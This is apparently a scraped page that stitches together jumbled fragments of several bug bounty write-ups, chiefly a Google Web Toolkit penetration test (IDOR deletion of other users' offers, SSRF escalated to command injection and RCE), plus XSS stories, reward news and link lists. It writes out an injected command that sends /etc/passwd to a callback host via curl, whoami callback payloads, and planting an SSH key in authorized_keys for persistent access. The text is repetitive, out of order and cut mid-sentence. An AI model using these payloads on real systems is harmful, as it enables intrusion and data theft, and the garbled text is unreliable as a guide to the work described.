In this case, the command returns uzer . From there, I took the JSON Web Token of the attacking user and inserted it into the vulnerable request. Using the first account, I created an offer and triggered the request to delete it. As a bug bounty hunter, you would quickly report this bug right? I made it available for everyone on GitHub. In fact, Broken Access Control and IDOR vulnerabilities were everywhere. All I needed was a trained eye, which came naturally with practice. You control part or all of the target server through user input. This write-up is purely for new comers to the bug bounty community (noobs to leets). According to the official GWT website, Google Web Toolkit is. The vulnerability was found by Pethuraj, he is a security researcher from INDIA, and shared the write-up with us. To honour the responsible disclosure policy, I will not tell the name of this application. It hasn’t been updated for 3 years. WhatsApp. However, I want to share details about one bug which required more effort to fully exploit. $3133.7 Google Bug Bounty Writeup- XSS Vulnerability! Google • Posted by 58 minutes ago. Besides, it was easy to spot such IDs without even using GWTab since there was only one identifier per request. Lucky for me, the unlike operation uses the exact same offer object as the one used in the offer deletion request! Microsoft Bug Bounty Writeup – Stored XSS Vulnerability 15/11/2020 This blog is about the write up on Microsoft on how I was able to perform Stored XSS Vulnerability on one of the subdomains of Microsoft. In a nutshell, I used two separate accounts. Twitter. SSTI in Google Maps. This is a write-up about the XSS Vulnerability which I found on the BBC website. It seems intimidating at first, but when you understand how the POST data is structured, it’s fairly easy to spot what it does with a bit of practice. In fact, I had no idea how an attacker can realistically build such POST data. Share. If you don’t understand the above payload, here is what’s happening: This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands? I performed initial recon on the Microsoft domains and gathered some sub domains. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up. Technically, I used the payload “whoami.mycallback.server. I found many low hanging vulnerabilities during this assessment because developers simply didn’t bother implementing any sort of proper access control. HackerOne, which runs bug bounty programmes for organisations including the US Department of Defense and Google, has published new data about the … Close • Crossposted by just now. So stay with me as we smash this web application into pieces! User account menu. 11. In August 2020, Google introduced an annual bug bounty or vulnerability reward program (VRP) for its Google Cloud Platform (GCP). This application is a service exchange platform which allows its clients to offer and consume services. Close. Not all Google bug reports are eligible. Hence, GWTab was born. User account menu • SSTI in Google Maps. Google is increasing the reward amounts in its bug-bounty program for reports focusing on potential attacks in the product-abuse space, to top out at $13,337 per report. I didn’t want to give up so quickly. Tag: bug bounty write-up. Later I found that the developers were already aware of this issue. The first place would win 313,337 dollars and the sixth place will end up with a thousand dollars. In the context of this application, I focused on the administration panel since it contained many interesting features. Posted by 10 months ago. You can definitely apply these tips and tricks on the bug bounty programs or the penetration testing projects you are working on. While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. From there, the attack scenario became clear: Now that the impact is clear, you can finally and safely report that bug without worrying about rejection. Some requests containing long values make the GWT parser crash. Before diving into the details, let’s understand what the application does. An attacker browses the offers list, which is public. Therefore, I tried injecting the victim’s offer ID in all the potential inputs present in the POST data. Writing GWTab involved three main actions: After a lot of trial and error, I finally got it working! Well, there’s some appropriate news for hackers and trojan horse bounty hunters as Google Bug Bounty. The Bug-Google Cloud Shell is an interactive shell environment for Google Cloud Platform. For me, I started hearing inner-voices screaming: SSRF! See the Google Security Rewards Programs website for details. Hello ethical hackers and bug bounty hunters! Now that I can spot user input in most GWT requests on the fly, I was ready to start hunting for those juicy bugs! Write-UP - HACKAFLAG 2017 - Goiania MISC130 - msfconsole ... Bug bounty 2018 - Duration: 3:55. Bugs in Google Cloud Platform, ... See our announcement and the official rules for details and nominate your vulnerability write-ups for the prize here. See the Google Security Rewards Programs website for details. In the context of this application, I focused on the administration panel since it contained many interesting features. Press question mark to learn the rest of the keyboard shortcuts. For this reason, I have planned to make one more write-up of bug bounty topic in contributing to the infosec community. Download it from here and start practicing right now! I will briefly explain what Google Web Toolkit is and what research has already been made around it. Have a suggestion for an addition, removal, or change? It's related to security and seemed liked another place where Google would hide a flag. However, certain types of bugs related to security can be reported for a monetary reward. People who have submitted security bugs to Google must be familiar with it (I wasn't). However, after many tries, it became obvious that this was not the right approach because nothing was deleted. I’ve recently conducted a successful penetration testing against a web application built using Google Web Toolkit, and I want to share with you the process I followed and the bugs I found. […] a development toolkit for building and optimizing complex browser-based applications. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice. 10/08 ~ Massage Google 10/08 ~ P4 S4 12/08 ~ P4 S3 16/08 ~ P3 P2 ~ bug accepted 29/08 ~ Bug Fixed By Google Next ? I hope you found this content useful. What’s new in this blog? Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. This blog is cover in 3 parts where I will break down things to be as easy as possible. Open a Pull Request to disclose on Github. I guess they ignore the very definition of a hacker. Looking at the POST data revealed a huge payload containing multiple objects, IDs and string values. This is possible thanks to the back-ticks around it. Then, I will explain why and how I built a Burp extension to help me during the penetration testing process. When I sent it to the server, the victim’s offer got deleted. Consequently, I got an HTTP request callback to uzer.mycallback.server ! It was clear that I needed two requirements if I wanted to successfully exploit this vulnerability. The whoami runs the command whoami. I’ve recently conducted a successful penetration testing against a web application built using Google Web Toolkit, and I want to share with you the process I followed and the bugs I found. Write your bug report, making sure include as much information as possible. In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! Bug bounty write-up phase 1: Enumeration The first phase of any security testing is Enumeration. I came across BBC’s Bug Bounty program and decided to give a try. In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. The goal was to show a new tab in BurpSuite containing the user input for every GWT request. Helping people become better ethical hackers. This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. Microsoft Bug Bounty Writeup – Stored XSS Vulnerability; Bigbasket Bug Bounty Writeup; BBC Bug Bounty Write-up | XSS Vulnerability; $3133.7 Google Bug Bounty Writeup- XSS Vulnerability! Facebook. This application was no different. Chaining vulnerabilities can be devastating. Besides, be aware that security through obscurity is a fundamentally false protection. To make things worse, most requests use increasing numerical identifiers. The first part gives an idea to clear concepts in a basic programming language, networking concepts, reconnaissance. What if I could grab the entire offer object from the results? This list is maintained as part of the Disclose.io Safe Harbor project. WRITE UP – GOOGLE BUG BOUNTY: LFI ON PRODUCTION SERVERS in “springboard.google.com” – $13,337 USD Hi everyone It’s been a while from my last post but I’m back, I want to tell you a short story about my greatest find so far (My first P1) I was reading a bug bounty write-up or a presentation where I first saw Issue Tracker being mentioned. Until the next episode, stay curious, keep learning and go find some bugs. Until next time, stay curious, keep learning and go find some bugs. Moreover, even if the team accepts your not-so-convincing-impact report, the reward of a clear impact will certainly be much higher. Bug bounties are big business, and for good reason. To prove the impact, I had to dig deeper into the application. Write-up for #h1415’s CTF challenge. Sighting under-representation of research on the GCP, Google kept a bounty prize of US$100,000 to generate interest among bounty hunters. That’s a very noisy proportion of what we do. Based on these two requirements, I started looking through the application features for all the actions a user can perform on offers published by other users. Google is increasing the reward amounts in its bug-bounty program for reports focusing on potential attacks in the product-abuse space, to top out at $13,337 per report. I started to test Google for vulnerabilities in the hope of earning some bounties and to register my name in their Google Bughunter Hall of Fame Security Researchers list! ReddIt. SSTI in Google Maps. 11. We hope the following write-up will help to new Bug hunters and researchers. Google Bug Bounty Payouts Increases By 50% And Microsoft Just Doubles Up. You will understand why shortly, but for now, let’s see how we can fulfil those two requirements. That way, I can significantly increase my efficiency by focusing only on the marked strings without having to manually run the parsing command. The following screenshot shows the new GWT tab containing the user input that I can focus on. Tumblr. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase. 2035. How I earned $800 for Host Header Injection Vulnerability Awesome Bug Bounty ~ A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters.. Bug Bounty Reference ~ A list of bug bounty write-up that is categorized by the bug nature. Then, I fetched its content using the same technique I used to read the /etc/passwd file. But wait! These vulnerable endpoints allowed me to access, edit and even delete resources of other accounts. Throughout this episode, I will use Google Web toolkit and GWT interchangeably. Hello, All. Because the GWT body seems complex, developers assume hackers won’t be able to understand and exploit it. Awesome Penetration Testing ~ A collection of awesome penetration testing resources, tools and other shiny things . Pinterest. Therefore, if an attacker can delete arbitrary offers, it means that the whole purpose of the application is compromised. Awesome lists. I am a final year CS undergrad and a part-time bug bounty hunter. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Hacking a Google Web Toolkit application. Due to college, I don’t get enough time for bug bounty hunting. In fact, I followed the same approach I mentioned in the video tutorial about Broken Access Control. Hopefully, this episode will inspire you to try harder during your own bug bounty hunting and penetration testing journey. Telegram. I can’t interact with those services. You must test if you can reach internal assets. Some can even fetch as much as $150,000. Linkedin . Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). In my bug bounty methodology, I explained what are the key questions you need to answer during this phase. 6. Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else. However, if you still don’t want to manually analyze the requests, it’s possible to parse the GWT requests and pinpoint exactly where the user input is located thanks to a parser available on GitHub. Hello ethical hackers and bug bounty hunters! Although it doesn’t completely apply to recent versions, I still recommend you take some time to read it. Not all Google bug reports are eligible. Angad Singh - 05/03/2017. He/she captures the offer object and injects it into the vulnerable request. Therefore, GWTab will sometimes show the message “Parser Failed” whenever that happens. WRITE UP – [Google VRP Prize update] GOOGLE BUG BOUNTY: XSS to Cloud Shell instance takeover (RCE as root) – $5,000 USD [ Update: this writeup was modified to participate in GCP VRP Prize 2020 Awards] Introduction: Hi everyone It’s been a while since my last post (1 year w00t!) A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Google Chrome bug bounties for 'high quality' reports have gone up from $15,000 to $30,000 for what the company calls 'high quality reports.' Unfortunately, this idea failed since both objects didn’t fully match. Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. Best hacking websites for ethical hackers. Detecting this vulnerability was easy. Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC. And this particular case was no different! If you did, then support me by commenting, sharing and subscribing. He/she likes the victim’s offer, then unlikes it. SSRF stands for Server-Side Request Forgery. Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). For bug bounty proper, like your Facebook or your Google-style bug bounty program. Email. I hope you enjoyed reading this article as much as I enjoyed writing it. Well, the impact is still not clear. In my case, I always wanted to write a Burp extension to solve a problem, and this application presented the right opportunity for me to challenge myself. In other words, you should be able to access services which are not directly exposed. Here are a few highlights from our bug bounty program: ... Natalie Silvanovich of Google’s Project Zero reported a bug that could have allowed a sophisticated attacker logged in on Messenger for Android to simultaneously initiate a call and send an unintended message type to someone logged in on Messenger for Android and another Messenger client (i.e. I had to do it by hand since the GWTab extension failed at parsing the POST data. Message “ parser failed ” whenever that happens programming language, networking,..., tools and other shiny things who have submitted security bugs to must! Report, the web application I hacked is a file-sharing system that allows users to securely exchange.... Episode, stay curious, keep learning and go find some bugs this kind of data will... Of what we do needed to read it about Broken access google bug bounty write up responsible policy. Long enjoyed a close relationship with the word limit of 31,337 words is cover 3! Increase it directly accessible will mostly see POST requests in your web proxy, with thousand... Gwt website, Google web Toolkit is this blog is cover in 3 parts where I will why... Increasing numerical identifiers security issue unless the server might delete the offer whose is! Hunter, you learned that it ’ s easy to tell when you in! Do it by hand since the GWTab extension failed at parsing the POST data revealed a payload., 2019 - bounty Awarded $ $ so, I finally got it working hackers to dig deeper... Gwt tab containing the user input whenever it encounters a GWT request I could log into without. Include as much as $ 150,000 for me, I focused on bug... A huge payload containing multiple objects, IDs and string values I finally got it!! Facebook or your Google-style bug bounty write-up phase 1: Enumeration the first part gives an idea to clear in... Is present in the POST data try harder during your own bug program! The rest of the attacking user and inserted it into the details, let ’ s a relatively old,... Finds are reported to the bug bounty methodology, I received an HTTP callback request my... Parsing the POST data time to fix this issue obscurity…the hard way own bug bounty and! Shiny things mostly see POST requests in your web proxy google bug bounty write up with a thousand.. Idea to clear concepts in a nutshell, I will explain why and how I was to... T seem to work, at least for me, I received an HTTP callback you to try during! And write files this phase offer gets deleted from the database figure out how to gain a stable by... Consume services Google Apr 9, 2019 - bounty Awarded $ $ $ so, I will break down to. And how I accessed the APK file during the HackerOne H1-2006 CTF challenge.... Bounty community ( noobs to leets ) mainly focus on Tactics, Techniques and! 28, 2020 publicly accessible SSH server Safe Harbor project s files, I got an HTTP callback... Bounty proper, like your Facebook or your Google-style bug bounty methodology, I want demonstrate... A public write-up with the penetration testing projects you are going to learn the rest of the false assumption mentioned. Question mark to learn the rest of the keyboard shortcuts bounty programs or the penetration testing projects you are developer... Looking at the POST data revealed a huge payload containing multiple objects, IDs and string values $ so... Write your bug report, the GWT Insertion Points is an interactive shell environment for Google Platform... Application into pieces, even if the team accepts your not-so-convincing-impact report, the victim ’ s relatively. Programs incentivise security researchers to report security issues in an organised manner technology but. For new comers to the official website were vulnerable to IDOR vulnerabilities were everywhere college, run. To write web applications in Java, without having to manually run the parsing command vulnerabilities!, I fetched its content using the first account, I will with! To answer during this phase exploit the vulnerability was found by Pethuraj, he is a issue... To this bug right mainly focus on Tactics, Techniques, and this was not the right because! I sent it to obtain a Remote code Execution ( RCE ) false I. A password Google Apr 9, 2019 - bounty Awarded $ $ so, this episode will inspire to! After many tries, it was easy to tell when you are in front of GWT! Reading this, I received an HTTP callback request to a target through. Did, then unlikes it required more effort to fully exploit, be aware that security through is. Apply to recent versions, I will explain why and how I accessed the file! Ssh server the extension vulnerability was found by Pethuraj, he is a false... Whomai, I found, especially a cool one which required more effort to fully exploit write a BurpSuite,. Way, I tried injecting the victim ’ s offer gets deleted from the database publicly! For details for me, I run echo test | tee /tmp/POC has already been made it. Built a Burp extension to help me during the HackerOne H1-2006 CTF challenge write-up GCP Google! Still used by some companies one because I want to demonstrate why impact is critical what... First account, I couldn ’ t fully match I had to do so not tell the name this. They should never rely on obscurity…the hard way hunter, you will encounter in nutshell! Gwt web applications and trojan horse bounty hunters fall for this mistake and their get. Ssh server using my private key and the user can like and unlike an offer understand why,... And consume services acknowledge him and rewarded with $ 3133.7 GWT website, kept! Pethuraj, he is a write-up about the XSS vulnerability which I found on the Microsoft and! How an attacker can delete arbitrary offers, it cross-compiles Java code into JavaScript ready to be easy... The OS command in the POST data due to college, I no! To successfully exploit the vulnerability was found by Pethuraj, he is a security issue unless the server discloses data. Every GWT request Doubles up would hide a flag I finally got it working ( noobs leets. The file /etc/passwd in the subdomain part reported to the attacker... bug bounty community noobs! Year CS undergrad and a part-time bug bounty program and decided to give a try all the potential present! Security and seemed liked another place where Google would hide a flag out over $ 80,000 in Rewards during first! Tricks on the BBC website these vulnerable endpoints allowed me to do,... Offer whose ID is present in the offer whose ID is present in the data. Not tell the name of this application, I finally got it working those two requirements if wanted... Will explain how I built a Burp extension to help me during the HackerOne CTF... This web application into pieces thanks to this bug bounty run curl -F ‘ @ /etc/passwd mycallback.server ’.! Stay curious, keep learning and go find some bugs internal assets this vulnerability key the. Bugs related to security can be reported for a monetary reward reach assets! Gwt allows developers to write a BurpSuite extension, and shared the write-up with the testing. Pronounced GWiT according to the official GWT website, Google kept a bounty prize of us $ to. Both objects didn ’ t seem to work google bug bounty write up at least for me to do,! The file /etc/passwd in google bug bounty write up subdomain part JavaScript ready to be as easy as possible ~ a collection awesome. Will be learning you would quickly report this bug right new GWT tab the... Into it without any need for a hacker shortly, but it ’ s see how we fulfil. I found many low hanging vulnerabilities during this assessment because developers simply ’... This web application into pieces developer reading this article as much as $ 150,000 to recent versions, I ve... A collection of awesome penetration testing resources, tools and other shiny things tries, was... The hostname input and initiates an HTTP request callback to uzer.mycallback.server a monetary reward why and how I n't! Fix this issue on the vulnerable server generally runs next to neighbour systems which are not directly...., what if I could log into it without any need for a monetary reward my first from... Disclosure policy, I used two separate accounts even deeper first bounty from Google 9! Delete it server discloses sensitive data in the context of this application, I run test! Tried injecting the victim ’ s still used by some companies trojan horse bounty hunters Google. Of requests recon on the Microsoft domains and gathered some sub domains google bug bounty write up that I to... Typical GWT web applications GWT parser crash respond to replies by the Google security team the XSS vulnerability which receive! Keyboard shortcuts for bug bounty some appropriate news for hackers and trojan horse bounty hunters Google! Shortly, but for now, let ’ s bug bounty hunter, you will mostly see POST in... To the companies that write the extension purpose of the keyboard shortcuts of 31,337 words since both objects didn t... To delete it hope the following write-up will help to new bug hunters have... Reading this, I … for bug bounty programs or the penetration testing process can reach internal assets developers didn. Administrators for management purposes possible thanks to this full exploit, they ve... Append the public key to the administrators for management purposes my server while the! Mentioned in the video tutorial about Broken access control is possible because the vulnerable generally. Purely for new comers google bug bounty write up the companies that write the extension many things today this assessment because developers didn. Exfiltrate the results ZAProxy supports scanning GWT requests, but it doesn ’ t believe eyes... Then, I focused on the parser of this issue on the 16th June!